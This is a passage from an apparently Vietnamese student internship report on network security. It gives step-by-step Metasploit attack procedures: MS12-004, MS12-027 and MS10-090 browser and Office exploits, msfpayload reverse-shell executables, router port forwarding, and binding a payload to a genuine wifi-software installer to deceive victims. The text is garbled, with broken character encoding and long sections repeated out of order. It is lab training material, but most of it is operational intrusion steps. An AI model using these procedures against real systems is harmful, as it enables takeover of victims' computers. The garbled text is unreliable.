- Set payload windowsmeterpreterreverse_tcp
38
Cuốt cugraveng gotilde lệnh ldquo Exploitrdquo để bắt đầu khai thaacutec lỗi
Luacutec nagravey maacutey BackTrack sẽ tạo ra 1 đương link Khi maacutey XP truy cập vagraveo đường link nagravey
thigrave sẽ bị xacircm nhập
39
Trecircn maacutey XP mở trigravenh duyệt IE vagrave truy cập vagraveo đường link đoacute
Ngay lập tức maacutey BackTrac sẽ gửi caacutec đoạn matilde độc để xacircm nhập dựa vagraveo lỗ hổng
40
Khi maacutey Backtrack thocircng baacuteo đatilde coacute 1 phiecircn kết nối thigrave luacutec đoacute ta đatilde coacute thể xacircm nhập vagraveo
maacutey nạn nhacircn
Dugraveng lệnh ldquosessionsrdquo để kiểm tra thocircng tin phiecircn kết nối
41
Tiếp theo dugraveng lệnh ldquosession ndashI [ID của phiecircn kết nối]rdquo để xacircm nhập vagraveo maacutey nạn
nhacircn
Tới đacircy ta đatilde coacute thể lagravem chủ hệ thống của maacutey nạn nhacircn
- Dugraveng lệnh ldquogetuidrdquo để lấy thocircng tin Username
- Dugraveng lện ldquosysinfordquo để xem thocircng tin maacutey nạn nhacircn
- Dugraveng lecircnh ldquoshellrdquo để xacircm nhacircp hệ thống
42
Thử tạo 1 thư mục coacute tecircn ldquotrungrdquo bằng lệnh ldquomd trungrdquo
Ngay lập tức trecircn magraven higravenh maacutey XP sẽ coacute thư mục ldquotrungrdquo
43
Như vậy ta đatilde hoagraven thagravenh khai thaacutec matilde lỗi ms12_004
2254 LỖI MS12_027
Lỗi MS12_027 lagrave lỗi magrave thocircng qua bộ cocircng cụ Office hacker sẽ tấn cocircng vagraveo hệ thống vagrave
chiếm quyền điều khiển Trong caacutec phiecircn bản Office phổ biến (từ 2003 2007 2010) đều diacutenh
lỗ hổng nagravey
Bắt đầu quaacute trigravenh tấn cocircng Ta khởi động Metasploit bằng cacircu lệnh ldquomsfconsolerdquo trecircn
Backtrack
44
Dugraveng lệnh ldquosearch ms12_027rdquo để tigravem module của matilde lỗi trong Metasploit
Sau khi coacute đường dẫn của module Dugraveng lệnh ldquo use [đường dẫn module]rdquo để sử dụng
45
Gotilde lệnh ldquo Show optionsrdquo để xem những thuộc tiacutenh cần thiết lập
Cần tạo 1 file giả coacute định dạng doc để lagravem cocircng cụ xacircm nhập maacutey nạn nhacircn
Dugraveng lệnh ldquo Set filename [ten file]docrdquo
46
Tiếp đoacute lần lượt gotilde lệnh
- ldquoSet payload windowsmeterpreterreverse_tcprdquo thiết lập payload của
module
- ldquoSet LHOST [ip maacutey Backtrack]rdquo Thiết lập ip maacutey lắng nghe
Sau đoacute gotilde lệnh ldquoExploitrdquo để hoagraven thagravenh việc thiết lập thocircng tin vagrave tạo file giả
47
Maacutey Backtrack luacutec nagravey sẽ tạo ra file doc vagrave thocircng baacuteo đường dẫn file được tạo ra
Kế tiếp ta cần thiết lập 1 trigravenh lắng nghe vagrave điều khiển maacutey nạn nhacircn ( sau khi maacutey nạn
nhacircn bị nhiễm matilde độc trong file doc)
Dugraveng lệnh ldquouse exploitmultihandlerrdquo
48
Sau đoacute thiết lập caacutec thocircng số
- ldquoSet payload windowsmeterpreterreverse_tcprdquo
- ldquoSet LHOST [ip maacutey Backtrack]rdquo
Sau đoacute dugraveng lệnh ldquoExploitrdquo để bắt đầu lắng nghe vagrave thiết lập phiecircn kết nối với maacutey nạn
nhacircn để xacircm nhập ngay khi maacutey nạn nhacircn bị nhiễm matilde độc khi mở file doc
Tới đacircy đatilde hoagraven tất việc thiết lập vagrave triển khai xacircm nhập Giờ ta sẽ chờ maacutey nạn nhacircn bị
49
nhiễm matilde độc Caacutech dễ nhất lagrave đưa file doc lecircn trigravenh duyệt web để nạn nhacircn tải về
Copy file doc được tạo vagraveo thư mục varwww Mở console khaacutec lecircnh gotilde lệnh
ldquocp [đường dẫn tới file doc] varwwwrdquo
Sau đoacute triển khai web server bằng lệnh
ldquoetcinitdapache 2 startrdquo
Từ maacutey XP truy cập vagraveo địa chỉ ldquo http[ip maacutey backtrack][file doc]rdquo 1 cửa sổ ldquo file
downloadrdquo hiện ra
50
Khi file doc được mở tại maacutey nạn nhacircn Ngay luacutec nagravey maacutey Backtrack sẽ kết nối tới maacutey
nạn nhacircn vagrave bắt đầu xacircm nhập Khi coacute thocircng baacuteo 1 session đatilde được thiết lập thigrave ta đatilde coacute
thể chiểm quyền user đang đăng nhập trecircn maacutey nạn nhacircn
51
- Dugraveng lệnh ldquogetuidrdquo để lấy thocircng tin Username
- Dugraveng lện ldquosysinfordquo để xem thocircng tin maacutey nạn nhacircn
- Dugraveng lecircnh ldquoshellrdquo để xacircm nhacircp hệ thống
52
Tạo 1 thư mục tecircn ldquotrungrdquo bằng lệnh ldquomd trungrdquo
Kiểm tra trecircn magraven higravenh maacutey XP ta thấy thư mục vừa đươc tạo từ maacutey Backtrack
Tới đacircy ta đatilde kết thuacutec quaacute trigravenh xacircm nhập qua matilde lỗi ms12_027
2255 MỞ PORT TREN MODEMTẤN CONG NGOAI MẠNG
INTERNET
53
Đầu tiecircn dugraveng lệnh ldquopingrdquo để kiểm tra kết nối internet
Sau đoacute dugraveng lệnh ldquomsfpayload windowsshell_reverse_tcp LHOST=[ip mặt ngoagravei maacutey
Backtrack] LPORT=[port sẽ mở trong modem] X gt tmp[tecircn file]exerdquo để tạo 1 file shell
(file thực thi) Sau nagravey ta sẽ gửi file nagravey cho nạn nhacircn để kết nối với maacutey nạn nhacircn Trong
higravenh dưới
Lhost=15428158 lagrave ip mặt ngoagravei của maacutey Backtrack( Vagraveo trang whatismyipcom để xem
ip nagravey)
Lport=4455 lagrave port được chỉ định để lắng nghe phiecircn kết nối Port nagravey sẽ được mở trong
modem internet vagrave được trả về địa chỉ ip local của maacutey Backtrack
tmpMypublickWifiexe lagrave file shell ta tạo ra từ cacircu lệnh nagravey coacute tecircn lagrave ldquoMypublicWifirdquo vagrave
được lưu ở đường dẫn tmp
Dugraveng lệnh ldquoifconfigrdquo để xem ip của maacutey BackTrack trong mạng Lan Sau nagravey khi mở
port ta sẽ trỏ port đoacute về ip nagravey
54
Đăng nhập vagraveo modem từ trigravenh duyệt web vagraveo mục Nat vagrave mở port khi natildey ra đatilde chọn
55
Tiếp theo mở cửa sổ console khaacutec vagrave khởi động Metasploit bằng cacircu lệnh ldquomsfconsolerdquo
Sử dụng module multihander trong Metasploit để giữ kết nối
Gotilde lệnh ldquouse exploitmultihanderrdquo
Lần lượt gotilde caacutec lệnh
- ldquoSet payload windowsshellreverse_tcprdquo để chọn payload cho module
- ldquoSet lhost [ip mặt ngoagravei maacutey BackTrack]rdquo Cấu higravenh ip lắng nghe nhận kết nối
trecircn mạng
- ldquoSet lport [port được mở]rdquo Cấu higravenh port lắng nghe
Dugraveng lệnh ldquoShow optionsrdquo để kiểm tra lại thocircng tin đatilde cấu higravenh
56
Tới đacircy ta dugraveng lệnh ldquoexploitrdquo để bắt đầu lắng nghe
Việc cograven lại lagrave chờ nạn nhacircn bị nhiễm matilde độc khi chạy file shell ta đatilde tạo ra Vấn đề lagrave
lagravem sao để nạn nhacircn thực thi file đoacute File shell nằm trong đường dẫn ldquotmpmypublicwifirdquo
magrave khi natildey ta đatilde tạo
57
Ở đacircy ta gheacutep file ldquomypublicwifiexerdquo do Backtrack tạo ra với 1 file setup của phần mềm
phaacutet wifi coacute tecircn ldquomypublicwifiexerdquo thật sự khaacutec Việc nagravey sẽ dễ đaacutenh lừa được nạn nhacircn
hơn Khi gheacutep xong ta sẽ coacute 1 file setup của phần mềm mypublicwifi thật sự tuy nhiecircn
khi nạn nhacircn chạy file setup nagravey cũng sẽ đồng thời chạy file do Backtrack tạo ra Để gheacutep
được ta coacute thể tham khảo trecircn mạng với từ khoacutea ldquobind two exerdquo
58
Khi nạn nhacircn chạy file setup nagravey thigrave maacutey Backtrack lập tức sẽ tạo kết nối với maacutey nạn
nhacircn Khi coacute thocircng baacuteo 1 sessions được thiết lập thigrave ta đatilde xacircm nhập được vagraveo maacutey nạn
nhacircn
Thử tạo 1 thư mục trecircn ổ đĩa ldquoCrdquo của maacutey nạn nhacircn bằng lệnh
ldquoCd C rdquo Lệnh nagravey đưa vị triacute lagravem việc về ổ C
ldquomkdir Trungrdquo Lệnh nagravey tạo thư mục tecircn Trung
Vagrave kiểm tra trecircn maacutey nạn nhacircn
59
Tới đacircy ta kết thuacutec việc tấn cocircng maacutey nạn nhacircn ngoagravei mạng internet bằng Metasploit qua
việc tạo file shell chứa matilde độc
2256 CAgraveI ĐẶT METASPLOIT TREN VPS SỬ DỤNG GIAO DIỆN
WEB CỦA METASPLOIT KHAI THAacuteC MAtilde LỖI MS10_090 TỪ
VPS
Từ VPS tải phần mềm chương trigravenh Metasploit từ web site httpmetasploitcom Cagravei
đặt như caacutec phần mềm khaacutec Chuacute yacute tắt tường lửa vagrave chương trigravenh anti virut nếu coacute
Đăng nhập vagraveo VPS mở giao diện web của Metasploit Community
Chọn Start-gtprogram-gtmetasploit-gtAccess metasploit UI
60
Chọn project ở đacircy migravenh để project default
Click Module -gtsearch
Gotilde vagraveo ocirc tigravem kiếm matilde lỗi ms10_090 Sau đoacute click vagraveo module hiện ra
61
Khai baacuteo thocircng số srvhost lagrave địa chỉ ip của VPS Sau đoacute chọn Run module
Sau khi Module được chạy Metasploit sẽ tạo ra 1 đường link Khi victim truy cập đường
link nagravey thigrave sẽ bị xacircm nhập
62
Kiểm tra tiacutenh thagravenh cocircng bằng caacutech từ 1 maacutey XP được kết nối internet ta truy cập vagraveo
đường link trecircn
Ngay lập tức Metasloit sẽ gửi caacutec kết nối tới Victim
63
Khi coacute thocircng baacuteo 1 session đatilde được thiết lập lagrave ta đatilde thagravenh cocircng
Ta đatilde coacute thể xacircm nhập hoagraven toagraven vagraveo maacutey victim Xemtải filetạo filehelliplagravem gigrave tugravey yacute
64
Sau đacircy lagrave 1 số higravenh ảnh xacircm nhập vagraveo maacutey victim
Truy cập ổ đĩa trecircn maacutey Victim
Tải dữ liệu trecircn maacutey Victim
65
Kết thuacutec module xacircm nhập qua internet bằng matilde lỗi ms10_090 với phần mềm Metasploit
được cagravei đặt trecircn VPS
2257 XAcircM NHẬP WINDOWS 8 TỪ VPS
Cần chuẩn bị
- 1 maacutey Backtrack
- 1 VPS được cagravei sẵn Metasploit
Trecircn maacutey Backtrack Tạo 1 file thực thi để gửi cho victim Khi Victim chạy file nagravey thigrave sẽ
bị xacircm nhập
Để tạo file shel gotilde lệnh
Msfpayload windowsshell_reverse_tcp lhost=[IP VPS] lport=4455 X gt tmp[ten
file]exe
File shell nagravey sẽ đc lưu tại đường dẫn tmp
66
Sau đoacute đăng nhập vagraveo VPS khởi động metasploit vagrave cấu higravenh metasploit về chế độ lắng
nghe vagrave giữ caacutec kết nối
Gotilde caacutec lệnh
- Use exploitmultihander Chuyển về chế độ lắng nghe
- Set payload windowsshellreverse_tcp Chọn payload
- Set lhost[ip VPS] Cấu higravenh IP lắng nghe
- Set lport 4455 cấu higravenh port lắng nghe
Sau đoacute gotilde lệnh Exploit để bắt đầu
67
Việc cần lagravem bacircy giờ lagrave gửi file shell ban đầu tạo ở maacutey Backtrack cho Victim Mỗi 1
victim chạy file shell thigrave VPS sẽ bắt được 1 kết nối để xacircm nhập
Giờ ta sẽ cho maacutey windows 8 chạy file shell
Vagrave ngay lập tức VPS sẽ bắt được kết nối vagrave xacircm nhập
Dugraveng lệnh mkdir Trung để tạo 1 thư mục coacute tecircn Trung trecircn magraven higravenh maacutey windows 8
68
Kiểm tra trecircn magraven higravenh maacutey windows 8 ta đatilde thấy thư mục Trung
Kết thuacutec module xacircm nhập maacutey tiacutenh windwos 8 từ VPS
69
CHƯƠNG 3 NHẬN XEacuteT- ĐAacuteNH GIAacute
31 ƯU ĐIỂM
Đề tagravei an ninh mạng giuacutep cho em hiểu quaacute trigravenh tấn cocircng chuacuteng ta cần phải lagravem những gigrave
phải chuẩn bị thu thập những thocircng tin như thế nagraveo vagrave từ đacircu Sau đoacute lagrave quaacute trigravenh tấn cocircng
vagraveo hệ thống maacutey tiacutenh nạn nhacircn Từ đoacute biết được caacutech thức cũng như quaacute trigravenh hacker sẽ
lagravem gigrave qua đoacute chuacuteng ta sẽ biết được caacutech phograveng thủ vagrave triển khai hệ thống an ninh mạng
giuacutep cho hệ thống của ta an toagraven trước những cuộc tấn cocircng
32 KHUYẾT ĐIỂM
Đề tagravei nagravey em mới được lagravem quen vagrave tigravem hiểu necircn đối tượng để xacircm nhập em vẫn dugraveng
những hệ điều hagravenh cũ như windows XP Windows 7 Đến hiện nay Microsoft đatilde khai tử
hệ điều hagravenh XP necircn những matilde lỗi em thực hiện ở trecircn đatilde mất đi 1 phần nagraveo yacute nghĩa Qua
đoacute em thấy được sự rộng lớn của an ninh mạng Phải thay đổi vagrave cập nhật từng luacutec
33 KẾT LUẬN
Trong quaacute trigravenh nghiecircn cứu đề tagravei an ninh mạng em nhận thấy rằng đacircy lagrave một trong
những lĩnh vực rất đa dạng vagrave phong phuacute vagrave thật sự quan trọng đặc biệt lagrave vấn đề lagravem
sao cho hệ thống maacutey tiacutenh hoạt động trơn tru traacutenh được đe dọa những cuộc tấn cocircng
của hacker Noacute khocircng những gacircy nguy hại đến người dugraveng magrave đặc biệt lagrave những doanh
nghiệp những tập đoagraven ngacircn hagraveng tagravei chiacutenh Quaacute trigravenh tigravem hiểu vagrave nghiecircn cứu tại
Trung Tacircm Đagraveo Tạo Quản Trị Mạng amp An Ninh Mạng Quốc tế ATHENA chỉ vỏn vẹn
hai thaacuteng vagrave cograven rất nhiều kiến thức khaacutec liecircn quan em nhận thấy migravenh cần phải tiếp tục
nỗ lực hơn nữa nhưng đề tagravei an ninh mạng thật sự rất locirci cuốn vagrave hấp dẫn đối với em
Kiến thức thực tiễn rất đa dạng vagrave phong phuacute so với những gigrave em học được vagrave nghiecircn
cứu em sẽ nỗ lực cố gắng hơn nữa bởi mong ước của em lagrave trở thagravenh chuyecircn gia an
ninh mạng cao cấp
29
Sau khi coacute đường dẫn dugraveng lệnh ldquouse [đường dẫn của module]rdquo để bắt đầu thiết lập
thocircng số
Dugraveng lệnh ldquoshow optionsrdquo để biết caacutec thocircng tin cần thiết lập
30
Lần lượt thiết lập caacutec thocircng số bằng caacutec lệnh
- Set srvhost [ip maacutey backtrack]
- Set lhost [ip maacutey backtrack]
- Set payload windowsmeterpreterreverse_tcp
Cuối cugraveng dugraveng lệnh ldquoExploitrdquo để khởi động module
31
Luacutec nagravey tại maacutey Backtrack sẽ tạo ra 1 đường link Nếu maacutey XP nhấp vagraveo đường link nagravey
thigrave sẽ bị xacircm nhập
Mở trigravenh duyệt IE tại maacutey XP vagrave truy cập vagraveo đường link được tạo từ maacutey BackTrack
32
Luacutec nagravey maacutey BackTrack sẽ gửi matilde độc tới maacutey XP Vagrave sau đoacute thực hiện 1 phiecircn kết nối
để xacircm nhập
Dugraveng lệnh ldquosessionsrdquo để xem thocircng tin phiecircn kết nối
Tiếp theo dugraveng lệnh ldquosessions ndashI [ID của session]rdquo để bắt đầu xacircm nhập
33
Tới đacircy ta đatilde hoagraven tất quaacute trigravenh xacircm nhập Bacircy giờ ta dugraveng caacutec lệnh
- Sysinfo để lấy thocircng tin maacutey nạn nhacircn ( ở đacircy lagrave maacutey XP)
- Getuid để lấy thocircng tin Username
- Shell xacircm nhập vagraveo maacutey nạn nhacircn
Thử kết quả bằng caacutech dugraveng lệnh ldquo md trungrdquo để tạo 1 thư mục tecircn ldquotrungrdquo trecircn maacutey nạn
nhacircn
34
Vagrave kiểm tra trecircn magraven higravenh maacutey XP đatilde coacute thư mục vừa tạo
2253 LỖI MS12_004
Matilde lỗi nagravey khai thaacutec lỗi của file MIDI trong IE
Trước tiecircn trecircn maacutey BackTrack dugraveng lệnh ldquo ifconfigrdquo để kiểm tra địa chỉ IP Sau đoacute dugraveng
lệnh ldquo ping [IP maacutey XP]rdquo để kiểm tra kết nối giữa maacutey BackTrack vagrave maacutey XP đatilde thocircng
với nhau
35
Sau đoacute dugraveng lệnh ldquomsfconsolerdquo để khởi động Metasploit
Dugraveng lệnh ldquo search ms12_004rdquo để tigravem module của matilde lỗi
36
Sau khi hệ thống tigravem ra đường dẫn của module matilde lỗi ms12_004 Ta ghi nhớ đường dẫn
sau đoacute dugraveng lệnh ldquouse [đường dẫn]rdquo để bắt đầu sử dụng
37
Dugraveng lệnh ldquoShow optionsrdquo để xem caacutec thocircng tin cần thiết lập
Tiếp theo thiết lập caacutec thocircng số cần thiết bằng caacutec lệnh
- Set SRVHOST [ip maacutey Backtrack]
- Set LHOST [ip maacutey BackTrack]
- Set payload windowsmeterpreterreverse_tcp
38
Cuốt cugraveng gotilde lệnh ldquo Exploitrdquo để bắt đầu khai thaacutec lỗi
Luacutec nagravey maacutey BackTrack sẽ tạo ra 1 đương link Khi maacutey XP truy cập vagraveo đường link nagravey
thigrave sẽ bị xacircm nhập
39
Trecircn maacutey XP mở trigravenh duyệt IE vagrave truy cập vagraveo đường link đoacute
Ngay lập tức maacutey BackTrac sẽ gửi caacutec đoạn matilde độc để xacircm nhập dựa vagraveo lỗ hổng
40
Khi maacutey Backtrack thocircng baacuteo đatilde coacute 1 phiecircn kết nối thigrave luacutec đoacute ta đatilde coacute thể xacircm nhập vagraveo
maacutey nạn nhacircn
Dugraveng lệnh ldquosessionsrdquo để kiểm tra thocircng tin phiecircn kết nối
41
Tiếp theo dugraveng lệnh ldquosession ndashI [ID của phiecircn kết nối]rdquo để xacircm nhập vagraveo maacutey nạn
nhacircn
Tới đacircy ta đatilde coacute thể lagravem chủ hệ thống của maacutey nạn nhacircn
- Dugraveng lệnh ldquogetuidrdquo để lấy thocircng tin Username
- Dugraveng lện ldquosysinfordquo để xem thocircng tin maacutey nạn nhacircn
- Dugraveng lecircnh ldquoshellrdquo để xacircm nhacircp hệ thống
42
Thử tạo 1 thư mục coacute tecircn ldquotrungrdquo bằng lệnh ldquomd trungrdquo
Ngay lập tức trecircn magraven higravenh maacutey XP sẽ coacute thư mục ldquotrungrdquo
43
Như vậy ta đatilde hoagraven thagravenh khai thaacutec matilde lỗi ms12_004
2254 LỖI MS12_027
Lỗi MS12_027 lagrave lỗi magrave thocircng qua bộ cocircng cụ Office hacker sẽ tấn cocircng vagraveo hệ thống vagrave
chiếm quyền điều khiển Trong caacutec phiecircn bản Office phổ biến (từ 2003 2007 2010) đều diacutenh
lỗ hổng nagravey
Bắt đầu quaacute trigravenh tấn cocircng Ta khởi động Metasploit bằng cacircu lệnh ldquomsfconsolerdquo trecircn
Backtrack
44
Dugraveng lệnh ldquosearch ms12_027rdquo để tigravem module của matilde lỗi trong Metasploit
Sau khi coacute đường dẫn của module Dugraveng lệnh ldquo use [đường dẫn module]rdquo để sử dụng
45
Gotilde lệnh ldquo Show optionsrdquo để xem những thuộc tiacutenh cần thiết lập
Cần tạo 1 file giả coacute định dạng doc để lagravem cocircng cụ xacircm nhập maacutey nạn nhacircn
Dugraveng lệnh ldquo Set filename [ten file]docrdquo
46
Tiếp đoacute lần lượt gotilde lệnh
- ldquoSet payload windowsmeterpreterreverse_tcprdquo thiết lập payload của
module
- ldquoSet LHOST [ip maacutey Backtrack]rdquo Thiết lập ip maacutey lắng nghe
Sau đoacute gotilde lệnh ldquoExploitrdquo để hoagraven thagravenh việc thiết lập thocircng tin vagrave tạo file giả
47
Maacutey Backtrack luacutec nagravey sẽ tạo ra file doc vagrave thocircng baacuteo đường dẫn file được tạo ra
Kế tiếp ta cần thiết lập 1 trigravenh lắng nghe vagrave điều khiển maacutey nạn nhacircn ( sau khi maacutey nạn
nhacircn bị nhiễm matilde độc trong file doc)
Dugraveng lệnh ldquouse exploitmultihandlerrdquo
48
Sau đoacute thiết lập caacutec thocircng số
- ldquoSet payload windowsmeterpreterreverse_tcprdquo
- ldquoSet LHOST [ip maacutey Backtrack]rdquo
Sau đoacute dugraveng lệnh ldquoExploitrdquo để bắt đầu lắng nghe vagrave thiết lập phiecircn kết nối với maacutey nạn
nhacircn để xacircm nhập ngay khi maacutey nạn nhacircn bị nhiễm matilde độc khi mở file doc
Tới đacircy đatilde hoagraven tất việc thiết lập vagrave triển khai xacircm nhập Giờ ta sẽ chờ maacutey nạn nhacircn bị
49
nhiễm matilde độc Caacutech dễ nhất lagrave đưa file doc lecircn trigravenh duyệt web để nạn nhacircn tải về
Copy file doc được tạo vagraveo thư mục varwww Mở console khaacutec lecircnh gotilde lệnh
ldquocp [đường dẫn tới file doc] varwwwrdquo
Sau đoacute triển khai web server bằng lệnh
ldquoetcinitdapache 2 startrdquo
Từ maacutey XP truy cập vagraveo địa chỉ ldquo http[ip maacutey backtrack][file doc]rdquo 1 cửa sổ ldquo file
downloadrdquo hiện ra
50
Khi file doc được mở tại maacutey nạn nhacircn Ngay luacutec nagravey maacutey Backtrack sẽ kết nối tới maacutey
nạn nhacircn vagrave bắt đầu xacircm nhập Khi coacute thocircng baacuteo 1 session đatilde được thiết lập thigrave ta đatilde coacute
thể chiểm quyền user đang đăng nhập trecircn maacutey nạn nhacircn
51
- Dugraveng lệnh ldquogetuidrdquo để lấy thocircng tin Username
- Dugraveng lện ldquosysinfordquo để xem thocircng tin maacutey nạn nhacircn
- Dugraveng lecircnh ldquoshellrdquo để xacircm nhacircp hệ thống
52
Tạo 1 thư mục tecircn ldquotrungrdquo bằng lệnh ldquomd trungrdquo
Kiểm tra trecircn magraven higravenh maacutey XP ta thấy thư mục vừa đươc tạo từ maacutey Backtrack
Tới đacircy ta đatilde kết thuacutec quaacute trigravenh xacircm nhập qua matilde lỗi ms12_027
2255 MỞ PORT TREN MODEMTẤN CONG NGOAI MẠNG
INTERNET
53
Đầu tiecircn dugraveng lệnh ldquopingrdquo để kiểm tra kết nối internet
Sau đoacute dugraveng lệnh ldquomsfpayload windowsshell_reverse_tcp LHOST=[ip mặt ngoagravei maacutey
Backtrack] LPORT=[port sẽ mở trong modem] X gt tmp[tecircn file]exerdquo để tạo 1 file shell
(file thực thi) Sau nagravey ta sẽ gửi file nagravey cho nạn nhacircn để kết nối với maacutey nạn nhacircn Trong
higravenh dưới
Lhost=15428158 lagrave ip mặt ngoagravei của maacutey Backtrack( Vagraveo trang whatismyipcom để xem
ip nagravey)
Lport=4455 lagrave port được chỉ định để lắng nghe phiecircn kết nối Port nagravey sẽ được mở trong
modem internet vagrave được trả về địa chỉ ip local của maacutey Backtrack
tmpMypublickWifiexe lagrave file shell ta tạo ra từ cacircu lệnh nagravey coacute tecircn lagrave ldquoMypublicWifirdquo vagrave
được lưu ở đường dẫn tmp
Dugraveng lệnh ldquoifconfigrdquo để xem ip của maacutey BackTrack trong mạng Lan Sau nagravey khi mở
port ta sẽ trỏ port đoacute về ip nagravey
54
Đăng nhập vagraveo modem từ trigravenh duyệt web vagraveo mục Nat vagrave mở port khi natildey ra đatilde chọn
55
Tiếp theo mở cửa sổ console khaacutec vagrave khởi động Metasploit bằng cacircu lệnh ldquomsfconsolerdquo
Sử dụng module multihander trong Metasploit để giữ kết nối
Gotilde lệnh ldquouse exploitmultihanderrdquo
Lần lượt gotilde caacutec lệnh
- ldquoSet payload windowsshellreverse_tcprdquo để chọn payload cho module
- ldquoSet lhost [ip mặt ngoagravei maacutey BackTrack]rdquo Cấu higravenh ip lắng nghe nhận kết nối
trecircn mạng
- ldquoSet lport [port được mở]rdquo Cấu higravenh port lắng nghe
Dugraveng lệnh ldquoShow optionsrdquo để kiểm tra lại thocircng tin đatilde cấu higravenh
56
Tới đacircy ta dugraveng lệnh ldquoexploitrdquo để bắt đầu lắng nghe
Việc cograven lại lagrave chờ nạn nhacircn bị nhiễm matilde độc khi chạy file shell ta đatilde tạo ra Vấn đề lagrave
lagravem sao để nạn nhacircn thực thi file đoacute File shell nằm trong đường dẫn ldquotmpmypublicwifirdquo
magrave khi natildey ta đatilde tạo
57
Ở đacircy ta gheacutep file ldquomypublicwifiexerdquo do Backtrack tạo ra với 1 file setup của phần mềm
phaacutet wifi coacute tecircn ldquomypublicwifiexerdquo thật sự khaacutec Việc nagravey sẽ dễ đaacutenh lừa được nạn nhacircn
hơn Khi gheacutep xong ta sẽ coacute 1 file setup của phần mềm mypublicwifi thật sự tuy nhiecircn
khi nạn nhacircn chạy file setup nagravey cũng sẽ đồng thời chạy file do Backtrack tạo ra Để gheacutep
được ta coacute thể tham khảo trecircn mạng với từ khoacutea ldquobind two exerdquo
58
Khi nạn nhacircn chạy file setup nagravey thigrave maacutey Backtrack lập tức sẽ tạo kết nối với maacutey nạn
nhacircn Khi coacute thocircng baacuteo 1 sessions được thiết lập thigrave ta đatilde xacircm nhập được vagraveo maacutey nạn
nhacircn
Thử tạo 1 thư mục trecircn ổ đĩa ldquoCrdquo của maacutey nạn nhacircn bằng lệnh
ldquoCd C rdquo Lệnh nagravey đưa vị triacute lagravem việc về ổ C
ldquomkdir Trungrdquo Lệnh nagravey tạo thư mục tecircn Trung
Vagrave kiểm tra trecircn maacutey nạn nhacircn
59
Tới đacircy ta kết thuacutec việc tấn cocircng maacutey nạn nhacircn ngoagravei mạng internet bằng Metasploit qua
việc tạo file shell chứa matilde độc
2256 CAgraveI ĐẶT METASPLOIT TREN VPS SỬ DỤNG GIAO DIỆN
WEB CỦA METASPLOIT KHAI THAacuteC MAtilde LỖI MS10_090 TỪ
VPS
Từ VPS tải phần mềm chương trigravenh Metasploit từ web site httpmetasploitcom Cagravei
đặt như caacutec phần mềm khaacutec Chuacute yacute tắt tường lửa vagrave chương trigravenh anti virut nếu coacute
Đăng nhập vagraveo VPS mở giao diện web của Metasploit Community
Chọn Start-gtprogram-gtmetasploit-gtAccess metasploit UI
60
Chọn project ở đacircy migravenh để project default
Click Module -gtsearch
Gotilde vagraveo ocirc tigravem kiếm matilde lỗi ms10_090 Sau đoacute click vagraveo module hiện ra
61
Khai baacuteo thocircng số srvhost lagrave địa chỉ ip của VPS Sau đoacute chọn Run module
Sau khi Module được chạy Metasploit sẽ tạo ra 1 đường link Khi victim truy cập đường
link nagravey thigrave sẽ bị xacircm nhập
62
Kiểm tra tiacutenh thagravenh cocircng bằng caacutech từ 1 maacutey XP được kết nối internet ta truy cập vagraveo
đường link trecircn
Ngay lập tức Metasloit sẽ gửi caacutec kết nối tới Victim
63
Khi coacute thocircng baacuteo 1 session đatilde được thiết lập lagrave ta đatilde thagravenh cocircng
Ta đatilde coacute thể xacircm nhập hoagraven toagraven vagraveo maacutey victim Xemtải filetạo filehelliplagravem gigrave tugravey yacute
64
Sau đacircy lagrave 1 số higravenh ảnh xacircm nhập vagraveo maacutey victim
Truy cập ổ đĩa trecircn maacutey Victim
Tải dữ liệu trecircn maacutey Victim
65
Kết thuacutec module xacircm nhập qua internet bằng matilde lỗi ms10_090 với phần mềm Metasploit
được cagravei đặt trecircn VPS
2257 XAcircM NHẬP WINDOWS 8 TỪ VPS
Cần chuẩn bị
- 1 maacutey Backtrack
- 1 VPS được cagravei sẵn Metasploit
Trecircn maacutey Backtrack Tạo 1 file thực thi để gửi cho victim Khi Victim chạy file nagravey thigrave sẽ
bị xacircm nhập
Để tạo file shel gotilde lệnh
Msfpayload windowsshell_reverse_tcp lhost=[IP VPS] lport=4455 X gt tmp[ten
file]exe
File shell nagravey sẽ đc lưu tại đường dẫn tmp
66
Sau đoacute đăng nhập vagraveo VPS khởi động metasploit vagrave cấu higravenh metasploit về chế độ lắng
nghe vagrave giữ caacutec kết nối
Gotilde caacutec lệnh
- Use exploitmultihander Chuyển về chế độ lắng nghe
- Set payload windowsshellreverse_tcp Chọn payload
- Set lhost[ip VPS] Cấu higravenh IP lắng nghe
- Set lport 4455 cấu higravenh port lắng nghe
Sau đoacute gotilde lệnh Exploit để bắt đầu
67
Việc cần lagravem bacircy giờ lagrave gửi file shell ban đầu tạo ở maacutey Backtrack cho Victim Mỗi 1
victim chạy file shell thigrave VPS sẽ bắt được 1 kết nối để xacircm nhập
Giờ ta sẽ cho maacutey windows 8 chạy file shell
Vagrave ngay lập tức VPS sẽ bắt được kết nối vagrave xacircm nhập
Dugraveng lệnh mkdir Trung để tạo 1 thư mục coacute tecircn Trung trecircn magraven higravenh maacutey windows 8
68
Kiểm tra trecircn magraven higravenh maacutey windows 8 ta đatilde thấy thư mục Trung
Kết thuacutec module xacircm nhập maacutey tiacutenh windwos 8 từ VPS
69
CHƯƠNG 3 NHẬN XEacuteT- ĐAacuteNH GIAacute
31 ƯU ĐIỂM
Đề tagravei an ninh mạng giuacutep cho em hiểu quaacute trigravenh tấn cocircng chuacuteng ta cần phải lagravem những gigrave
phải chuẩn bị thu thập những thocircng tin như thế nagraveo vagrave từ đacircu Sau đoacute lagrave quaacute trigravenh tấn cocircng
vagraveo hệ thống maacutey tiacutenh nạn nhacircn Từ đoacute biết được caacutech thức cũng như quaacute trigravenh hacker sẽ
lagravem gigrave qua đoacute chuacuteng ta sẽ biết được caacutech phograveng thủ vagrave triển khai hệ thống an ninh mạng
giuacutep cho hệ thống của ta an toagraven trước những cuộc tấn cocircng
32 KHUYẾT ĐIỂM
Đề tagravei nagravey em mới được lagravem quen vagrave tigravem hiểu necircn đối tượng để xacircm nhập em vẫn dugraveng
những hệ điều hagravenh cũ như windows XP Windows 7 Đến hiện nay Microsoft đatilde khai tử
hệ điều hagravenh XP necircn những matilde lỗi em thực hiện ở trecircn đatilde mất đi 1 phần nagraveo yacute nghĩa Qua
đoacute em thấy được sự rộng lớn của an ninh mạng Phải thay đổi vagrave cập nhật từng luacutec
33 KẾT LUẬN
Trong quaacute trigravenh nghiecircn cứu đề tagravei an ninh mạng em nhận thấy rằng đacircy lagrave một trong
